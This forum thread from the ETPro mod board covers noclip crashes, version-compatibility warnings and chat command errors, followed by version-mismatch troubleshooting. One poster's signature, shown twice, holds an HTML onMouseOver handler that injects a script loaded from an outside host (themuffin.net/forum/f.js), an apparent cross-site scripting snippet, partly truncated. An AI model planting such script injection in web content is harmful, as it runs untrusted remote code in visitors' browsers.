Error in etpro 3.1.8

Discussion for Bani's Tournament Mod

Moderators: Forum moderators, developers

Simpledark

Error in etpro 3.1.8

Post by Simpledark »

I recently tried to use the 3.1.8 betatest and noticed a little problem.

When using noclip the game get an error "etpro error - check console". If you "fly" out of the map or thru some walls the error pops-up.

If needed I can post here the console log.

I haven't tested the 3.1.0 but I don't remember having that problem in that version.

I will also check 3.1.9 to see if it also has the same problem.

I also got a strange warning: something like this "warning: server security is newer (10) than you can handle (9)" not the right spelling but I think you got the picture.

I will post more exact info in next post.
Been there... Done that... Argh... But what am I doing??
>>steven!

Post by >>steven! »

COMPETITION MOD
UK Elite Guard
#ukeg on Quakenet
www.ukeliteguard.co.uk
Est. Jan 2002
gotenks

Post by gotenks »

good reply, let's leave bugs in... :roll:
My Website
After a night of binge drinking:
=FF=im2good4u wrote:WTF wanst i on top ?
Ragnar_40k

Post by Ragnar_40k »

>>steven! wrote:COMPETITION MOD
Lol, most pub servers run 24/7 etpro, but I don't know any ETPro server that runs 24/7 competitions.
The Emperor watch over you.
Stuart

Post by Stuart »

Ragnar_40k wrote:
>>steven! wrote:COMPETITION MOD
Lol, most pub servers run 24/7 etpro, but I don't know any ETPro server that runs 24/7 competitions.
But its still a competition mod, if they choose to run it on pubs, thats their decision, but they might just have to keep the bugs that have nothing to do with competition. id rather see some competition improvements than see the etpro crew wasting their time making it possible to fly through walls
This space for rent.
bacon

Post by bacon »

Stuart wrote:id rather see some competition improvements than see the etpro crew wasting their time making it possible to fly through walls
I'd rather see them juggle torches but eh...whatever floats your boat!
gotenks

Post by gotenks »

you guys do realize that when you find a bug like this, it usually affects other things as well don't you?
My Website
After a night of binge drinking:
=FF=im2good4u wrote:WTF wanst i on top ?
Rain

Post by Rain »

gotenks wrote:you guys do realize that when you find a bug like this, it usually affects other things as well don't you?
OHSNOS LOGIC!!

Simpledark, can you get a demo?
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
Simpledark

Post by Simpledark »

I've tested on 3.1.9 and the same bug happens.

Tomorrow I will make a demo of it crashing, save the console error msg and that warning level 9 to 10 thing.

Se U guys later...

Even if is a competition mod, It has some features and fixes that etmain doesn't have. As an example you have the grenade thru door xploit.

So its use in pubs it concerns only to their admins.

Thanks guys
Simpledark

Post by Simpledark »

Here it goes

The demo: The crash Did: devmap oasis, noclip on, fly and crash

The message: WARNING: Server compatibility level (10) is newer than client knows how to handle (9)

The error in console:
Version: etpro
Reason: [MSG_ReadByte: illegible message]
debugBuffer: [BQwAswoXD5f8]

I also noticed other bugs:

When talking:
If typed in the console without the \ it should talk to all but displays the following error:
Unknown client game command: c

If talking only to fireteam the error is:
Unknown client game command: bc

If talking to team is:
Unknown client game command: tc

I tried several configs and tried creating new profile, to check if was some cvar that was making the bug but the result was always the same.

Reset to ETPro default settings and the bug prevailed. Tried in etmain and no bug.

Finally, in the menu, the new “Reset Enemy Spawntimer” and “Enemy spawntimer menu” can’t be binded to a key. I press the wanted key but nothing is set. Also, if I use the command to open the menu in the console, it doesn’t open causing unkown command.

If you need to contact me directly to test something you can do so by mail, MSN or ICQ.

I hope this helps. Thanks
uber-noob

Post by uber-noob »

I can't recreate any of the bugs you mentioned.

Did you get only the etpro-3_1_9.pk3 from a server our did you get the whole package from here? If you only got the pk3 its no surprise that you run into problems while hosting a local server, because you also need the updated qagame_mp_x86.dll/so. Also you may need to remove all earlier etpro pk3s before hosting a local server.

Also I noticed that et often runs into problems when you start a map directly via devmap, do first "/map oasis" and then "/devmap oasis" or "/forcecvar sv_cheats 1". You also may need to remove some custom PK3s because of the well known "too many PK3" bug.
Rain

Post by Rain »

This should only happen if the client is using an client version that's older than the server version. In your case, it looks like the client is running 3.1.0 and the server is running 3.1.9. The chat problem reinforces this theory.

Theoretically, the only reasons this should happen are if you're a) running an unpure server, or b) running the server with more than 1 version of the etpro pk3 installed (a very likely case if you're running a listen server instead of a dedicated server.)
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>